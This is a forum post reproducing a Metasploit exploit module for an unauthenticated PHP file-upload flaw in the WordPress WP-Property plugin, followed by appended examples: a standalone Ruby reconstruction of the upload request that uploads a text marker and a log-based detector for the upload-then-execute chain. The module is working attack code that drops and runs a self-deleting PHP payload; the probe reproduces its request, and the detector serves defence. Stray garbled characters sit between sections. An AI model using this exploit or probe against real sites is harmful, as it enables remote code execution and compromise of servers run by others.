WordPress WP-Property PHP File Upload Vulnerability

Original poster | Posted on 2013-1-4 19:51:30
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987' ],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Only confirms that uploadify.php is reachable. It does not prove the upload
  # handler is unpatched, hence CheckCode::Appears rather than Vulnerable.
  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    # Random file name; the PHP stub removes itself after running (:unlink_self).
    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # uploadify.php takes two multipart fields: Filedata (the file) and
    # folder (the directory under the web root where it is stored).
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # On success uploadify.php echoes the web path of the stored file.
    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    # Requesting the uploaded file executes the payload.
    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end

5 V- d# s1 f% I8 V0 w+ w不要问我这写的是什么 怎么利用 我是说msf.
0 E1 S# n1 l6 B4 E2 G* S! @( f1 u6 V3 {% m" p
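The module above hides the actual HTTP exchange behind Rex::MIME and the PhpEXE mixin. The following is an added example, not part of the original post or of the Metasploit module, that rebuilds the same two-field multipart POST with only the Ruby standard library, but uploads a harmless .txt marker instead of a PHP payload so an exposed endpoint can be confirmed without planting a shell. The function names, the marker file and the assumption that uploadify.php echoes an absolute web path to the stored file (which is how the module uses the response body) are mine; the request layout follows what the module sends.

```ruby
# Added example: stdlib-only reconstruction of the uploadify.php upload
# request used by the module. Not from the original post or Metasploit.
require 'net/http'
require 'uri'
require 'securerandom'

UPLOADIFY_PATH = 'wp-content/plugins/wp-property/third-party/uploadify/'

# Returns [content_type, body] for a multipart/form-data request carrying the
# two fields the module sends: Filedata (the file) and folder (the directory
# under the web root where the handler stores it).
def build_upload_request(site_path, file_name, file_bytes, boundary)
  site_path = site_path.end_with?('/') ? site_path : "#{site_path}/"
  folder = "#{site_path}#{UPLOADIFY_PATH}"
  crlf = "\r\n"
  body = String.new(encoding: Encoding::BINARY)
  body << "--#{boundary}#{crlf}"
  body << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{file_name}\"#{crlf}"
  body << "Content-Type: application/octet-stream#{crlf}#{crlf}"
  body << file_bytes.b << crlf
  body << "--#{boundary}#{crlf}"
  body << "Content-Disposition: form-data; name=\"folder\"#{crlf}#{crlf}"
  body << folder << crlf
  body << "--#{boundary}--#{crlf}"
  ["multipart/form-data; boundary=#{boundary}", body]
end

# The module accepts any 200 whose body mentions the file name and then
# requests the body verbatim. This is stricter (assumption: the handler
# echoes an absolute web path ending in our file name); anything else is nil.
def parse_upload_response(status, body, file_name)
  return nil unless status == 200
  path = body.to_s.strip
  return nil unless path.start_with?('/') && path.end_with?(file_name)
  path
end

# Live probe against a target you are authorised to test. Returns the web path
# of the uploaded marker, or nil if the endpoint did not behave as the module
# expects. Delete the marker afterwards.
def probe_uploadify(base_url, site_path = '/wordpress')
  marker_name = "#{SecureRandom.alphanumeric(5)}.txt"   # .txt, not .php: benign marker
  boundary = "----probe#{SecureRandom.hex(8)}"
  ctype, body = build_upload_request(site_path, marker_name, "probe #{Time.now.utc}", boundary)
  uri = URI.join(base_url, File.join(site_path, UPLOADIFY_PATH, 'uploadify.php'))
  req = Net::HTTP::Post.new(uri.request_uri)
  req['Content-Type'] = ctype
  req.body = body
  res = Net::HTTP.start(uri.host, uri.port, use_ssl: uri.scheme == 'https') { |http| http.request(req) }
  parse_upload_response(res.code.to_i, res.body, marker_name)
end

# Usage: ruby probe.rb http://target.example/ /wordpress
if __FILE__ == $0 && !ARGV.empty?
  puts probe_uploadify(ARGV.fetch(0), ARGV.fetch(1, '/wordpress')).inspect
end
```

A returned path means the handler accepted an unauthenticated file with an attacker-chosen name and directory, which is exactly the condition the module relies on; a .php name would then execute on the next GET, as the module's exploit method does.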
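On the defensive side, the module leaves a recognisable two-step trace: a POST to uploadify.php that returns 200, then a GET from the same client for a freshly named .php file in the uploadify directory. The following is an added example, not from the original post, that looks for that chain in a web server access log. The log lines are constructed for the example and the Apache/nginx combined format, the time window and the function names are my assumptions.

```ruby
# Added example: detect the upload-then-execute chain of the WP-Property
# uploadify.php exploit in an access log. Not from the original post.
require 'time'

# Constructed sample log (combined format). 203.0.113.7 runs the full chain;
# 198.51.100.9 only fetches the handler; 192.0.2.44 is refused with 403.
ACCESS_LOG = <<~LOG
  203.0.113.7 - - [04/Jan/2013:19:40:01 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  203.0.113.7 - - [04/Jan/2013:19:40:02 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 78 "-" "Mozilla/5.0"
  203.0.113.7 - - [04/Jan/2013:19:40:03 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/qWeRt.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
  198.51.100.9 - - [04/Jan/2013:19:41:10 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "curl/7.26"
  198.51.100.9 - - [04/Jan/2013:19:41:11 +0800] "GET /wordpress/?p=12 HTTP/1.1" 200 5120 "-" "curl/7.26"
  192.0.2.44 - - [04/Jan/2013:19:42:30 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 403 0 "-" "Mozilla/5.0"
LOG

LINE_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/
UPLOADIFY_DIR = '/wp-content/plugins/wp-property/third-party/uploadify/'

# Parses one combined-format line into a hash, or nil if it does not match.
def parse_line(line)
  m = LINE_RE.match(line)
  return nil unless m
  { ip: m[:ip], time: Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method], path: m[:path], status: m[:status].to_i }
end

# A successful upload attempt: POST to the handler answered with 200.
def upload_post?(e)
  e[:method] == 'POST' && e[:status] == 200 && e[:path].end_with?("#{UPLOADIFY_DIR}uploadify.php")
end

# A request for some other .php file inside the uploadify directory, i.e. the
# payload being executed. Query strings are ignored when taking the file name.
def dropped_php_get?(e)
  return false unless e[:method] == 'GET' && e[:path].include?(UPLOADIFY_DIR)
  name = e[:path].split('?', 2).first.split('/').last.to_s
  name.end_with?('.php') && name != 'uploadify.php'
end

# Returns one finding per (client, upload) where the same client fetched a
# dropped .php file within `window` seconds after a successful upload POST.
def find_uploadify_abuse(log_text, window: 300)
  events = log_text.each_line.map { |l| parse_line(l) }.compact
  findings = []
  events.group_by { |e| e[:ip] }.each do |ip, evs|
    evs.select { |e| upload_post?(e) }.each do |up|
      hit = evs.find { |e| dropped_php_get?(e) && (e[:time] - up[:time]).between?(0, window) }
      findings << { ip: ip, uploaded_at: up[:time], executed: hit[:path] } if hit
    end
  end
  findings
end

find_uploadify_abuse(ACCESS_LOG).each { |f| puts "#{f[:ip]} uploaded at #{f[:uploaded_at]} and ran #{f[:executed]}" }
```

Because uploadify.php is meant to be reached only from the plugin's admin pages, a lone 200 to a POST on it from an unauthenticated client is worth an alert on its own; the chain above is the high-confidence signal, and the payload's :unlink_self means the dropped file may already be gone by the time anyone looks on disk.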